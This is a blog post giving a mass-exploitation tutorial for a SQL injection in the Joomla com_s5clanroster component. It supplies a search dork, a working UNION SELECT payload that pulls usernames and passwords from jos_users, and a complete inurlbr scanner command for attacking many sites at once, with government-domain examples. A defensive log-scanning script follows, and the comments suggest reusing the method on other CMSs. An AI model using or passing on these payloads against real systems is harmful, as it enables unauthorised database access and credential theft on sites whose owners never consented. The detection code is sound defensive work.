Monday, July 6, 2015

Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit

MASS EXPLOIT Joomla - com_s5clanroster

USE INURLBR

In this tutorial we will use the inurlbr tool to find targets and then inject our exploitation string. We will use internal functions of the inurlbr script to convert the injection string to hexadecimal.

The com_s5clanroster component has a SQL injection flaw in its GET parameter "id". This article is based on the script written by the hacker TheLooper (script); when the injection succeeds, it is possible to read information from the target server's database.

DORK:
inurl:"index.php?option=com_s5clanroster"

SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-

POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}

With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr: 
http://github.com/googleinurl/SCANNER-INURLBR

SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'

SET FILE OUTPUT:
-s vuln.log

SET TYPE OF VALIDATION:
-t 3
       3   - The third type combines both the first and second types:
              Then, of course, it also establishes a connection with the exploit through the GET method
              Demo: www.target.com.br{exploit}


SET EXPLOIT REQUEST - GET:
--exploit-get {YOUR_GET}

Before setting the exploit we need to manipulate its string; for that we use an internal function of the inurlbr scanner to pass a validation string inside the SQL injection, so that vulnerable targets can be told apart from the rest.

Internal function - Converting strings to hexadecimal
 hex Encode values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330


--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(<br>) = 3c62723e
Example injection:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-

SET STRING VALIDATION:
Specify the string that will be searched for in the response:
Example: -a {string}
Usage:   -a '<title>hello world</title>'
If the specified value is found in the target's response, the target is considered vulnerable.
Setting:   -a 'inurlbr_vuln'
We validate the string "inurlbr_vuln" as it was passed inside the SQLi exploit; if that value appears in the target's response, the injection succeeded.

COMMAND FULL:
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-' -a 'inurlbr_vuln'
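From the defender's side, here is an added example (not code from the original post or from the inurlbr project) that scans web-server access-log lines for the com_s5clanroster injection pattern described above, decodes its 0x hex literals so the hidden inurlbr_vuln marker becomes visible, and records which table the UNION SELECT reads from. The log lines are constructed for the example.

```python
import binascii
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (Apache combined style, not real traffic);
# the second one carries the com_s5clanroster injection string from this page.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jul/2015:10:00:01 -0300] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [06/Jul/2015:10:00:07 -0300] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20- HTTP/1.1" 200 7331
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')
# UNION ... SELECT, plain or wrapped in MySQL version comments (/*!50000UnIoN*/)
UNION_RE = re.compile(r'(?:/\*!\d+\s*union\s*\*/|\bunion\b)[\s\S]{0,64}?'
                      r'(?:/\*!\d+\s*select\s*\*/|\bselect\b)', re.I)
HEX_RE = re.compile(r'\b0x([0-9a-f]{2,})\b', re.I)
FROM_RE = re.compile(r'\bfrom\s+([A-Za-z0-9_]+)', re.I)

def decode_hex_literals(sql: str) -> list:
    """Turn 0x.. literals back into text so markers such as inurlbr_vuln show up."""
    out = []
    for h in HEX_RE.findall(sql):
        try:
            out.append(binascii.unhexlify(h).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            out.append("?")  # odd-length or otherwise undecodable literal
    return out

def analyse_line(line: str):
    """Return a finding for an injection attempt on the id parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("url")).query, keep_blank_values=True)
    if query.get("option", [""])[0] != "com_s5clanroster":
        return None
    # parse_qs already decoded %27 and '+'; decode once more for double encoding
    decoded = unquote_plus(query.get("id", [""])[0])
    if not UNION_RE.search(decoded):
        return None
    return {"ip": m.group("ip"), "status": m.group("status"), "id": decoded,
            "hex_decoded": decode_hex_literals(decoded),
            "tables": FROM_RE.findall(decoded)}

def scan_log(text: str) -> list:
    """Run analyse_line over every line of an access log and keep the findings."""
    return [f for f in map(analyse_line, text.splitlines()) if f]
```

A 200 status on a flagged request is the signal to escalate: it means the page answered the UNION query rather than rejecting it.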

PRINT PROCESS:
6 comments:

  1. By default, only one result is found and it doesn't bring the password along. heh

    Replies
    2. Hello friend, all of this is 80% more to show the technique I used to validate the flaw, passing the string in the SQLi with the script's internal function converting it to hexadecimal.
      But clearly it can be used in other ways and on other CMSs.
      It can even be used with a wordlist full of SQLi using the scanner's internal SUB_PROCESS pattern.
      Look up the INURLBR scanner's sub_process afterwards.
      Any questions, we're here :) ~ later
  2. Value our language, translate the content before posting!

    Replies
    1. The content was always in PT-BR, but because it is used by many people from the Middle East, Russians, Chinese ... friends from other countries.
      English is the simplest language to understand and the standard for tools all over the world.
      It is not a question of valuing language X or Y, but a matter of logic and simplicity so that the whole community can easily translate the content posted here.
